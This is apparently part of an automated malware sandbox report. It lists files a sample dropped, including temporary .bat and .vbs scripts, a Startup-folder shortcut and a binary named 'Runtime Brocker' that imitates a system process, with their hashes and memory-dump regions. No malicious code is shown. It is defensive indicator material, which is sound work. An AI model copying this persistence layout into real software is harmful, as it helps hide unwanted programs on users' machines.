                                                    Filesize

                                                    60B

                                                    MD5

                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                    SHA1

                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                    SHA256

                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                    SHA512

                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                  • C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.bat

                                                    Filesize

                                                    263KB

                                                    MD5

                                                    c3c6e228bbc935a2d9d9bd91e331d02b

                                                    SHA1

                                                    c37f3872bb8fa411abe41662237a63c7b29a44c0

                                                    SHA256

                                                    41bdc1d19af1b9e2c09e4d126d4090ddc1d20b7ecb68ab98cc936f74267e0d8d

                                                    SHA512

                                                    5e912ebc795eeb1b0a72953847ca30129c8303f43f7fe4549e91ba0e7e31c23deb333e433e709e6bc3ad5dd3be3825bc727d3583c549c713cb5eaca995769aa3

                                                  • C:\Users\Admin\AppData\Local\Temp\kXmONzbeuL.vbs

                                                    Filesize

                                                    78B

                                                    MD5

                                                    c578d9653b22800c3eb6b6a51219bbb8

                                                    SHA1

                                                    a97aa251901bbe179a48dbc7a0c1872e163b1f2d

                                                    SHA256

                                                    20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

                                                    SHA512

                                                    3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                    Filesize

                                                    9B

                                                    MD5

                                                    8ca925ef49920b17c4b01371c8ac239d

                                                    SHA1

                                                    1377f0c125d6527883e0b5c22449d886630b62cc

                                                    SHA256

                                                    66b969a528e25431f686244052af993452f659387b5a73049245245ab8b5cfe2

                                                    SHA512

                                                    dfeec54b44aaeb502eb6c3f4eb216cbe48ea9e7e3ea54d5c732594b8f9176e840fc59a37a023e2d5a851151fa77eb2e47dbb01fe3bc22a12d060550b2e5d0006

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Brocker.lnk

                                                    Filesize

                                                    789B

                                                    MD5

                                                    5229e1d1f17d0f22fc403c302c43af1b

                                                    SHA1

                                                    b21de088be0dcc715ab2d9dda6208487b8696513

                                                    SHA256

                                                    20efa9d19e68b0d801b639d0120bafb2e37acfd02e98a47306b04139d7992dee

                                                    SHA512

                                                    95b3af9fbc6ab610f4072b5c75a487c645fd6547077a77f44ec7c47949f98e0d64131157ae487a088986f7585780c37f3d3b911b803086e88d87161c36eb1fe7

                                                  • C:\Users\Admin\AppData\Roaming\Runtime Brocker

                                                    Filesize

                                                    440KB

                                                    MD5

                                                    0e9ccd796e251916133392539572a374

                                                    SHA1

                                                    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                                    SHA256

                                                    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                                    SHA512

                                                    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                                  • C:\Users\Admin\AppData\Roaming\startup_str_526.vbs

                                                    Filesize

                                                    115B

                                                    MD5

                                                    13096f6c1e6b198637d01ec5f9631cd4

                                                    SHA1

                                                    d4e27d5d2d36423c0e65a5e2018431b1b23d301e

                                                    SHA256

                                                    a69eba32e30c44c9df109ab64c6646cf81920120d6edbb6d180d124b34f75f84

                                                    SHA512

                                                    486dfc5d78fc8259fdc6c0dcfcc6e576d3477f6d0c73f37dbc83571e4e9be778dc2c5b2cbaa46c0f3056c7fb9b0320319a71f9b5b72f3ec77a87f28b3e281a79

                                                  • memory/1612-119-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-117-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-121-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-120-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-112-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-118-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-122-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-111-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-113-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/1612-123-0x000001E1C08D0000-0x000001E1C08D1000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2512-60-0x000001FD6C770000-0x000001FD6C890000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/2512-100-0x000001FD6BEE0000-0x000001FD6BEEC000-memory.dmp

                                                    Filesize

                                                    48KB

                                                  • memory/2512-106-0x000001FD6CD90000-0x000001FD6CD9A000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/2512-146-0x000001FD6CD30000-0x000001FD6CD3A000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/2512-58-0x000001FD6C760000-0x000001FD6C76A000-memory.dmp

                                                    Filesize

                                                    40KB

                                                  • memory/2512-101-0x000001FD6D3C0000-0x000001FD6D43E000-memory.dmp

                                                    Filesize

                                                    504KB

                                                  • memory/2512-43-0x000001FD6C1C0000-0x000001FD6C1D0000-memory.dmp

                                                    Filesize

                                                    64KB

                                                  • memory/2512-107-0x000001FD6CCB0000-0x000001FD6CCBE000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/3156-57-0x00000164AAAF0000-0x00000164AAB36000-memory.dmp

                                                    Filesize

                                                    280KB

                                                  • memory/4532-14-0x000001CB506A0000-0x000001CB506D4000-memory.dmp

                                                    Filesize

                                                    208KB

                                                  • memory/4532-13-0x000001CB50690000-0x000001CB50698000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/4532-4-0x000001CB50400000-0x000001CB50422000-memory.dmp

                                                    Filesize

                                                    136KB